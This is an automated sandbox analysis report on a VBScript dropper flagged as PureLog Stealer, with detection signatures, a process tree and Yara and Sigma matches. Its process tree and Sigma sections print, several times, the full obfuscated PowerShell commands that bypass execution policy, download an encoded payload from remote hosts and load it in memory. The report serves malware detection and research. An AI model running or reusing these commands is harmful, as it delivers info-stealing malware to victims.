Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
0BO4n723Q8.vbs

Overview

General Information

Sample name:0BO4n723Q8.vbs
renamed because original name is a hash value
Original sample name:35d62ef87119b12931f40ed80b1cf35e8b32097027f77f96d27351fbf9d4501b.vbs
Analysis ID:1523824
MD5:19f9fc1579433299ad398e80b01f4137
SHA1:f1ebb5f2428d32d75b5c76da93ae9f776f95303a
SHA256:35d62ef87119b12931f40ed80b1cf35e8b32097027f77f96d27351fbf9d4501b
Tags:BlindEaglevbsuser-JAMESWT_MHT
Infos:

Detection

PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected PureLog Stealer
AI detected suspicious sample
Bypasses PowerShell execution policy
Found suspicious powershell code related to unpacking or dynamic code loading
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 7500 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0BO4n723Q8.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7584 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRlTnY6Q29tU3BlQ1s0LDI0LDI1XS1qb2luJycpICgoJzc5JysnZHVybCA9JysnIEtxamh0JysndHBzJysnOi8vaWE2MDAxMDAuJysndXMuJysnYXJjaGl2ZS5vcmcvJysnMjQvaXRlbXMvZGUnKyd0YWgtbm90ZS12L0RlJysndGFoTicrJ290ZScrJ1YudHh0S3FqJysnOzcnKyc5ZGJhc2U2NENvbnRlbicrJ3QgJysnPScrJyAoTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYicrJ0NsaWUnKydudCkuRG93bmxvYScrJ2RTdHJpbmcoNzlkdScrJ3JsKTs3JysnOWRiaW5hJysncnknKydDb250JysnZW50ID0nKycgJysnW1N5Jysnc3RlbS5DbycrJ24nKyd2ZXJ0JysnXTo6JysnRnJvbUJhc2UnKyc2JysnNFN0cmluZygnKyc3JysnOWRiYXNlNjRDb250ZW50KTs3JysnOWQnKydhc3NlbWInKydseSA9IFtSJysnZWYnKydsJysnZWN0aScrJ29uLkEnKydzJysnc2VtYmx5XTo6TG9hZCg3OWRiaW5hcicrJ3lDbycrJ250ZW50KScrJzsnKyc3OScrJ2R0eXBlID0nKycgNzlkJysnYXNzZW1ibCcrJ3kuR2V0VCcrJ3lwZShLJysncWonKydSJysndW5QRScrJy5Ib21lJysnS3FqKTsnKyc3OWRtJysnZXRob2QgPSAnKyc3OWR0eScrJ3AnKydlLkcnKydldE1ldGhvJysnZCgnKydLcScrJ2onKydWQUlLcScrJ2opOzc5ZG1ldGhvZC5JbnZvJysna2UoNzlkJysnbnUnKydsbCwnKycgW29iamVjJysndFtdXScrJ0AoS3FqJysndHgnKyd0LkhUT01SLzAzMS84NDIuODQxLjI3MS43MDEvLycrJzpwdHRoSycrJ3FqICwgS3FqJysnZGUnKydzYXRpdicrJ2Fkb0txaiAsIEtxamRlc2F0aXZhZCcrJ29LcWonKycgLCBLcWpkZScrJ3NhdGl2YWRvS3FqLEtxalJlZ0EnKydzbUtxaicrJywnKydLJysncWpLcScrJ2onKycpKScpLlJFUGxBY2UoKFtjaGFyXTU1K1tjaGFyXTU3K1tjaGFyXTEwMCksJyQnKS5SRVBsQWNlKChbY2hhcl03NStbY2hhcl0xMTMrW2NoYXJdMTA2KSxbc3RySW5nXVtjaGFyXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7744 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $eNv:ComSpeC[4,24,25]-join'') (('79'+'durl ='+' Kqjht'+'tps'+'://ia600100.'+'us.'+'archive.org/'+'24/items/de'+'tah-note-v/De'+'tahN'+'ote'+'V.txtKqj'+';7'+'9dbase64Conten'+'t '+'='+' (New-Object System.Net.W'+'eb'+'Clie'+'nt).Downloa'+'dString(79du'+'rl);7'+'9dbina'+'ry'+'Cont'+'ent ='+' '+'[Sy'+'stem.Co'+'n'+'vert'+']::'+'FromBase'+'6'+'4String('+'7'+'9dbase64Content);7'+'9d'+'assemb'+'ly = [R'+'ef'+'l'+'ecti'+'on.A'+'s'+'sembly]::Load(79dbinar'+'yCo'+'ntent)'+';'+'79'+'dtype ='+' 79d'+'assembl'+'y.GetT'+'ype(K'+'qj'+'R'+'unPE'+'.Home'+'Kqj);'+'79dm'+'ethod = '+'79dty'+'p'+'e.G'+'etMetho'+'d('+'Kq'+'j'+'VAIKq'+'j);79dmethod.Invo'+'ke(79d'+'nu'+'ll,'+' [objec'+'t[]]'+'@(Kqj'+'tx'+'t.HTOMR/031/842.841.271.701//'+':ptthK'+'qj , Kqj'+'de'+'sativ'+'adoKqj , Kqjdesativad'+'oKqj'+' , Kqjde'+'sativadoKqj,KqjRegA'+'smKqj'+','+'K'+'qjKq'+'j'+'))').REPlAce(([char]55+[char]57+[char]100),'$').REPlAce(([char]75+[char]113+[char]106),[strIng][char]39) )" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.1853253841.000001C46DDF0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
    00000004.00000002.1834352585.000001C465BDC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      Process Memory Space: powershell.exe PID: 7584INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
      • 0x2bcd:$b3: ::UTF8.GetString(
      • 0x2fefb:$b3: ::UTF8.GetString(
      • 0x2ffa8:$b3: ::UTF8.GetString(
      • 0x30571:$b3: ::UTF8.GetString(
      • 0x86dcb:$b3: ::UTF8.GetString(
      • 0x873bd:$b3: ::UTF8.GetString(
      • 0x92e69:$b3: ::UTF8.GetString(
      • 0x9648a:$b3: ::UTF8.GetString(
      • 0x98f7e:$b3: ::UTF8.GetString(
      • 0x99580:$b3: ::UTF8.GetString(
      • 0x99d68:$b3: ::UTF8.GetString(
      • 0x9a524:$b3: ::UTF8.GetString(
      • 0x9b6d3:$b3: ::UTF8.GetString(
      • 0x9bcc5:$b3: ::UTF8.GetString(
      • 0xd171f:$b3: ::UTF8.GetString(
      • 0xd1d19:$b3: ::UTF8.GetString(
      • 0xd2c8a:$b3: ::UTF8.GetString(
      • 0xd33d2:$b3: ::UTF8.GetString(
      • 0xd3ed2:$b3: ::UTF8.GetString(
      • 0xd4679:$b3: ::UTF8.GetString(
      • 0xd4ed5:$b3: ::UTF8.GetString(
      Process Memory Space: powershell.exe PID: 7744INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
      • 0x2e80f6:$b2: ::FromBase64String(
      • 0x2e98db:$b2: ::FromBase64String(
      • 0x13f:$s1: -join
      • 0x1382a:$s1: -join
      • 0x28a8bb:$s1: -join
      • 0x297b3c:$s1: -join
      • 0x29affe:$s1: -join
      • 0x29b698:$s1: -join
      • 0x29d194:$s1: -join
      • 0x29f3e8:$s1: -join
      • 0x29fc0f:$s1: -join
      • 0x2a046a:$s1: -join
      • 0x2a0ba5:$s1: -join
      • 0x2a0bd7:$s1: -join
      • 0x2a0c1f:$s1: -join
      • 0x2a0c3e:$s1: -join
      • 0x2a148f:$s1: -join
      • 0x2a160b:$s1: -join
      • 0x2a1683:$s1: -join
      • 0x2a1716:$s1: -join
      • 0x2a197c:$s1: -join

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      4.2.powershell.exe.1c4663f0ed8.0.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
        4.2.powershell.exe.1c4663f0ed8.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          4.2.powershell.exe.1c46ddf0000.1.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            4.2.powershell.exe.1c46ddf0000.1.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Base64 Encoded PowerShell Command Detected
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRlTnY6Q29tU3BlQ1s0LDI0LDI1XS1qb2luJycpICgoJzc5JysnZHVybCA9JysnIEtxamh0JysndHBzJysnOi8vaWE2MDAxMDAuJysndXMuJysnYXJjaGl2ZS5vcmcvJysnMjQvaXRlbXMvZGUnKyd0YWgtbm90ZS12L0RlJysndGFoTicrJ290ZScrJ1YudHh0S3FqJysnOzcnKyc5ZGJhc2U2NENvbnRlbicrJ3QgJysnPScrJyAoTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYicrJ0NsaWUnKydudCkuRG93bmxvYScrJ2RTdHJpbmcoNzlkdScrJ3JsKTs3JysnOWRiaW5hJysncnknKydDb250JysnZW50ID0nKycgJysnW1N5Jysnc3RlbS5DbycrJ24nKyd2ZXJ0JysnXTo6JysnRnJvbUJhc2UnKyc2JysnNFN0cmluZygnKyc3JysnOWRiYXNlNjRDb250ZW50KTs3JysnOWQnKydhc3NlbWInKydseSA9IFtSJysnZWYnKydsJysnZWN0aScrJ29uLkEnKydzJysnc2VtYmx5XTo6TG9hZCg3OWRiaW5hcicrJ3lDbycrJ250ZW50KScrJzsnKyc3OScrJ2R0eXBlID0nKycgNzlkJysnYXNzZW1ibCcrJ3kuR2V0VCcrJ3lwZShLJysncWonKydSJysndW5QRScrJy5Ib21lJysnS3FqKTsnKyc3OWRtJysnZXRob2QgPSAnKyc3OWR0eScrJ3AnKydlLkcnKydldE1ldGhvJysnZCgnKydLcScrJ2onKydWQUlLcScrJ2opOzc5ZG1ldGhvZC5JbnZvJysna2UoNzlkJysnbnUnKydsbCwnKycgW29iamVjJysndFtdXScrJ0AoS3FqJysndHgnKyd0LkhUT01SLzAzMS84NDIuODQxLjI3MS43MDEvLycrJzpwdHRoSycrJ3FqICwgS3FqJysnZGUnKydzYXRpdicrJ2Fkb0txaiAsIEtxamRlc2F0aXZhZCcrJ29LcWonKycgLCBLcWpkZScrJ3NhdGl2YWRvS3FqLEtxalJlZ0EnKydzbUtxaicrJywnKydLJysncWpLcScrJ2onKycpKScpLlJFUGxBY2UoKFtjaGFyXTU1K1tjaGFyXTU3K1tjaGFyXTEwMCksJyQnKS5SRVBsQWNlKChbY2hhcl03NStbY2hhcl0xMTMrW2NoYXJdMTA2KSxbc3RySW5nXVtjaGFyXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRlTnY6Q29tU3BlQ1s0LDI0LDI1XS1qb2luJycpICgoJzc5JysnZHVybCA9JysnIEtxamh0JysndHBzJysnOi8vaWE2MDAxMDAuJysndXMuJysnYXJjaGl2ZS5vcmcvJysnMjQvaXRlbXMvZGUnKyd0YWgtbm90ZS12L0RlJysndGFoTicrJ290ZScrJ1YudHh0S3FqJysnOzcnKyc5ZGJhc2U2NENvbnRlbicrJ3QgJysnPScrJyAoTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYicrJ0NsaWUnKydudCkuRG93bmxvYScrJ2RTdHJpbmcoNzlkdScrJ3JsKTs3JysnOWRiaW5hJysncnknKydDb250JysnZW50ID0nKycgJysnW1N5Jysnc3RlbS5DbycrJ24nKyd2ZXJ0JysnXTo6JysnRnJvbUJhc2UnKyc2JysnNFN0cmluZygnKyc3JysnOWRiYXNlNjRDb250ZW50KTs3JysnOWQnKydhc3NlbWInKydseSA9IFtSJysnZWYnKydsJysnZWN0aScrJ29uLkEnKydzJysnc2VtYmx5XTo6TG9hZCg3OWRiaW5hcicrJ3lDbycrJ250ZW50KScrJzsnKyc3OScrJ2R0eXBlID0nKycgNzlkJysnYXNzZW1ibCcrJ3kuR2V0VCcrJ3lwZShLJysncWonKydSJysndW5QRScrJy5Ib21lJysnS3FqKTsnKyc3OWRtJysnZXRob2QgPSAnKyc3OWR0eScrJ3AnKydlLkcnKydldE1ldGhvJysnZCgnKydLcScrJ2onKydWQUlLcScrJ2opOzc5ZG1ldGhvZC5JbnZvJysna2UoNzlkJysnbnUnKydsbCwnKycgW29iamVjJysndFtdXScrJ0AoS3FqJysndHgnKyd0LkhUT01SLzAzMS84NDIuODQxLjI3MS43MDEvLycrJzpwdHRoSycrJ3FqICwgS3FqJysnZGUnKydzYXRpdicrJ2Fkb0txaiAsIEtxamRlc2F0aXZhZCcrJ29LcWonKycgLCBLcWpkZScrJ3NhdGl2YWRvS3FqLEtxalJlZ0EnKydzbUtxaicrJywnKydLJysncWpLcScrJ2onKycpKScpLlJFUGxBY2UoKFtjaGFyXTU1K1tjaGFyXTU3K1tjaGFyXTEwMCksJyQnKS5SRVBsQWNlKChbY2hhcl03NStbY2hhcl0xMTMrW2NoYXJdMTA2KSxbc3RySW5nXVtjaGFyXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombas
              Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
              Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $eNv:ComSpeC[4,24,25]-join'') (('79'+'durl ='+' Kqjht'+'tps'+'://ia600100.'+'us.'+'archive.org/'+'24/items/de'+'tah-note-v/De'+'tahN'+'ote'+'V.txtKqj'+';7'+'9dbase64Conten'+'t '+'='+' (New-Object System.Net.W'+'eb'+'Clie'+'nt).Downloa'+'dString(79du'+'rl);7'+'9dbina'+'ry'+'Cont'+'ent ='+' '+'[Sy'+'stem.Co'+'n'+'vert'+']::'+'FromBase'+'6'+'4String('+'7'+'9dbase64Content);7'+'9d'+'assemb'+'ly = [R'+'ef'+'l'+'ecti'+'on.A'+'s'+'sembly]::Load(79dbinar'+'yCo'+'ntent)'+';'+'79'+'dtype ='+' 79d'+'assembl'+'y.GetT'+'ype(K'+'qj'+'R'+'unPE'+'.Home'+'Kqj);'+'79dm'+'ethod = '+'79dty'+'p'+'e.G'+'etMetho'+'d('+'Kq'+'j'+'VAIKq'+'j);79dmethod.Invo'+'ke(79d'+'nu'+'ll,'+' [objec'+'t[]]'+'@(Kqj'+'tx'+'t.HTOMR/031/842.841.271.701//'+':ptthK'+'qj , Kqj'+'de'+'sativ'+'adoKqj , Kqjdesativad'+'oKqj'+' , Kqjde'+'sativadoKqj,KqjRegA'+'smKqj'+','+'K'+'qjKq'+'j'+'))').REPlAce(([char]55+[char]57+[char]100),'$').REPlAce(([char]75+[char]113+[char]106),[strIng][char]39) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $eNv:ComSpeC[4,24,25]-join'') (('79'+'durl ='+' Kqjht'+'tps'+'://ia600100.'+'us.'+'archive.org/'+'24/items/de'+'tah-note-v/De'+'tahN'+'ote'+'V.txtKqj'+';7'+'9dbase64Conten'+'t '+'='+' (New-Object System.Net.W'+'eb'+'Clie'+'nt).Downloa'+'dString(79du'+'rl);7'+'9dbina'+'ry'+'Cont'+'ent ='+' '+'[Sy'+'stem.Co'+'n'+'vert'+']::'+'FromBase'+'6'+'4String('+'7'+'9dbase64Content);7'+'9d'+'assemb'+'ly = [R'+'ef'+'l'+'ecti'+'on.A'+'s'+'sembly]::Load(79dbinar'+'yCo'+'ntent)'+';'+'79'+'dtype ='+' 79d'+'assembl'+'y.GetT'+'ype(K'+'qj'+'R'+'unPE'+'.Home'+'Kqj);'+'79dm'+'ethod = '+'79dty'+'p'+'e.G'+'etMetho'+'d('+'Kq'+'j'+'VAIKq'+'j);79dmethod.Invo'+'ke(79d'+'nu'+'ll,'+' [objec'+'t[]]'+'@(Kqj'+'tx'+'t.HTOMR/031/842.841.271.701//'+':ptthK'+'qj , Kqj'+'de'+'sativ'+'adoKqj , Kqjdesativad'+'oKqj'+' , Kqjde'+'sativadoKqj,KqjRegA'+'smKqj'+','+'K'+'qjKq'+'j'+'))').REPlAce(([char]55+[char]57+[char]100),'$').REPlAce(([char]75+[char]113+[char]106),[strIng][char]39) )", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRlTnY6Q29tU3BlQ1s0LDI0LDI1XS1qb2luJycpICgoJzc5JysnZHVybCA9JysnIEtxamh0JysndHBzJysnOi8vaWE2MDAxMDAuJysndXMuJysnYXJjaGl2ZS5vcmcvJysnMjQvaXRlbXMvZGUnKyd0YWgtbm90ZS12L0RlJysndGFoTicrJ290ZScrJ1YudHh0S3FqJysnOzcnKyc5ZGJhc2U2NENvbnRlbicrJ3QgJysnPScrJyAoTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYicrJ0NsaWUnKydudCkuRG93bmxvYScrJ2RTdHJpbmcoNzlkdScrJ3JsKTs3JysnOWRiaW5hJysncnknKydDb250JysnZW50ID0nKycgJysnW1N5Jysnc3RlbS5DbycrJ24nKyd2ZXJ0JysnXTo6Jys
              Sigma detected: Potential PowerShell Command Line Obfuscation
              Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $eNv:ComSpeC[4,24,25]-join'') (('79'+'durl ='+' Kqjht'+'tps'+'://ia600100.'+'us.'+'archive.org/'+'24/items/de'+'tah-note-v/De'+'tahN'+'ote'+'V.txtKqj'+';7'+'9dbase64Conten'+'t '+'='+' (New-Object System.Net.W'+'eb'+'Clie'+'nt).Downloa'+'dString(79du'+'rl);7'+'9dbina'+'ry'+'Cont'+'ent ='+' '+'[Sy'+'stem.Co'+'n'+'vert'+']::'+'FromBase'+'6'+'4String('+'7'+'9dbase64Content);7'+'9d'+'assemb'+'ly = [R'+'ef'+'l'+'ecti'+'on.A'+'s'+'sembly]::Load(79dbinar'+'yCo'+'ntent)'+';'+'79'+'dtype ='+' 79d'+'assembl'+'y.GetT'+'ype(K'+'qj'+'R'+'unPE'+'.Home'+'Kqj);'+'79dm'+'ethod = '+'79dty'+'p'+'e.G'+'etMetho'+'d('+'Kq'+'j'+'VAIKq'+'j);79dmethod.Invo'+'ke(79d'+'nu'+'ll,'+' [objec'+'t[]]'+'@(Kqj'+'tx'+'t.HTOMR/031/842.841.271.701//'+':ptthK'+'qj , Kqj'+'de'+'sativ'+'adoKqj , Kqjdesativad'+'oKqj'+' , Kqjde'+'sativadoKqj,KqjRegA'+'smKqj'+','+'K'+'qjKq'+'j'+'))').REPlAce(([char]55+[char]57+[char]100),'$').REPlAce(([char]75+[char]113+[char]106),[strIng][char]39) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $eNv:ComSpeC[4,24,25]-join'') (('79'+'durl ='+' Kqjht'+'tps'+'://ia600100.'+'us.'+'archive.org/'+'24/items/de'+'tah-note-v/De'+'tahN'+'ote'+'V.txtKqj'+';7'+'9dbase64Conten'+'t '+'='+' (New-Object System.Net.W'+'eb'+'Clie'+'nt).Downloa'+'dString(79du'+'rl);7'+'9dbina'+'ry'+'Cont'+'ent ='+' '+'[Sy'+'stem.Co'+'n'+'vert'+']::'+'FromBase'+'6'+'4String('+'7'+'9dbase64Content);7'+'9d'+'assemb'+'ly = [R'+'ef'+'l'+'ecti'+'on.A'+'s'+'sembly]::Load(79dbinar'+'yCo'+'ntent)'+';'+'79'+'dtype ='+' 79d'+'assembl'+'y.GetT'+'ype(K'+'qj'+'R'+'unPE'+'.Home'+'Kqj);'+'79dm'+'ethod = '+'79dty'+'p'+'e.G'+'etMetho'+'d('+'Kq'+'j'+'VAIKq'+'j);79dmethod.Invo'+'ke(79d'+'nu'+'ll,'+' [objec'+'t[]]'+'@(Kqj'+'tx'+'t.HTOMR/031/842.841.271.701//'+':ptthK'+'qj , Kqj'+'de'+'sativ'+'adoKqj , Kqjdesativad'+'oKqj'+' , Kqjde'+'sativadoKqj,KqjRegA'+'smKqj'+','+'K'+'qjKq'+'j'+'))').REPlAce(([char]55+[char]57+[char]100),'$').REPlAce(([char]75+[char]113+[char]106),[strIng][char]39) )", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRlTnY6Q29tU3BlQ1s0LDI0LDI1XS1qb2luJycpICgoJzc5JysnZHVybCA9JysnIEtxamh0JysndHBzJysnOi8vaWE2MDAxMDAuJysndXMuJysnYXJjaGl2ZS5vcmcvJysnMjQvaXRlbXMvZGUnKyd0YWgtbm90ZS12L0RlJysndGFoTicrJ290ZScrJ1YudHh0S3FqJysnOzcnKyc5ZGJhc2U2NENvbnRlbicrJ3QgJysnPScrJyAoTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYicrJ0NsaWUnKydudCkuRG93bmxvYScrJ2RTdHJpbmcoNzlkdScrJ3JsKTs3JysnOWRiaW5hJysncnknKydDb250JysnZW50ID0nKycgJysnW1N5Jysnc3RlbS5DbycrJ24nKyd2ZXJ0JysnXTo6Jys
              Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
              Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $eNv:ComSpeC[4,24,25]-join'') (('79'+'durl ='+' Kqjht'+'tps'+'://ia600100.'+'us.'+'archive.org/'+'24/items/de'+'tah-note-v/De'+'tahN'+'ote'+'V.txtKqj'+';7'+'9dbase64Conten'+'t '+'='+' (New-Object System.Net.W'+'eb'+'Clie'+'nt).Downloa'+'dString(79du'+'rl);7'+'9dbina'+'ry'+'Cont'+'ent ='+' '+'[Sy'+'stem.Co'+'n'+'vert'+']::'+'FromBase'+'6'+'4String('+'7'+'9dbase64Content);7'+'9d'+'assemb'+'ly = [R'+'ef'+'l'+'ecti'+'on.A'+'s'+'sembly]::Load(79dbinar'+'yCo'+'ntent)'+';'+'79'+'dtype ='+' 79d'+'assembl'+'y.GetT'+'ype(K'+'qj'+'R'+'unPE'+'.Home'+'Kqj);'+'79dm'+'ethod = '+'79dty'+'p'+'e.G'+'etMetho'+'d('+'Kq'+'j'+'VAIKq'+'j);79dmethod.Invo'+'ke(79d'+'nu'+'ll,'+' [objec'+'t[]]'+'@(Kqj'+'tx'+'t.HTOMR/031/842.841.271.701//'+':ptthK'+'qj , Kqj'+'de'+'sativ'+'adoKqj , Kqjdesativad'+'oKqj'+' , Kqjde'+'sativadoKqj,KqjRegA'+'smKqj'+','+'K'+'qjKq'+'j'+'))').REPlAce(([char]55+[char]57+[char]100),'$').REPlAce(([char]75+[char]113+[char]106),[strIng][char]39) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $eNv:ComSpeC[4,24,25]-join'') (('79'+'durl ='+' Kqjht'+'tps'+'://ia600100.'+'us.'+'archive.org/'+'24/items/de'+'tah-note-v/De'+'tahN'+'ote'+'V.txtKqj'+';7'+'9dbase64Conten'+'t '+'='+' (New-Object System.Net.W'+'eb'+'Clie'+'nt).Downloa'+'dString(79du'+'rl);7'+'9dbina'+'ry'+'Cont'+'ent ='+' '+'[Sy'+'stem.Co'+'n'+'vert'+']::'+'FromBase'+'6'+'4String('+'7'+'9dbase64Content);7'+'9d'+'assemb'+'ly = [R'+'ef'+'l'+'ecti'+'on.A'+'s'+'sembly]::Load(79dbinar'+'yCo'+'ntent)'+';'+'79'+'dtype ='+' 79d'+'assembl'+'y.GetT'+'ype(K'+'qj'+'R'+'unPE'+'.Home'+'Kqj);'+'79dm'+'ethod = '+'79dty'+'p'+'e.G'+'etMetho'+'d('+'Kq'+'j'+'VAIKq'+'j);79dmethod.Invo'+'ke(79d'+'nu'+'ll,'+' [objec'+'t[]]'+'@(Kqj'+'tx'+'t.HTOMR/031/842.841.271.701//'+':ptthK'+'qj , Kqj'+'de'+'sativ'+'adoKqj , Kqjdesativad'+'oKqj'+' , Kqjde'+'sativadoKqj,KqjRegA'+'smKqj'+','+'K'+'qjKq'+'j'+'))').REPlAce(([char]55+[char]57+[char]100),'$').REPlAce(([char]75+[char]113+[char]106),[strIng][char]39) )", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRlTnY6Q29tU3BlQ1s0LDI0LDI1XS1qb2luJycpICgoJzc5JysnZHVybCA9JysnIEtxamh0JysndHBzJysnOi8vaWE2MDAxMDAuJysndXMuJysnYXJjaGl2ZS5vcmcvJysnMjQvaXRlbXMvZGUnKyd0YWgtbm90ZS12L0RlJysndGFoTicrJ290ZScrJ1YudHh0S3FqJysnOzcnKyc5ZGJhc2U2NENvbnRlbicrJ3QgJysnPScrJyAoTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYicrJ0NsaWUnKydudCkuRG93bmxvYScrJ2RTdHJpbmcoNzlkdScrJ3JsKTs3JysnOWRiaW5hJysncnknKydDb250JysnZW50ID0nKycgJysnW1N5Jysnc3RlbS5DbycrJ24nKyd2ZXJ0JysnXTo6Jys
              Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 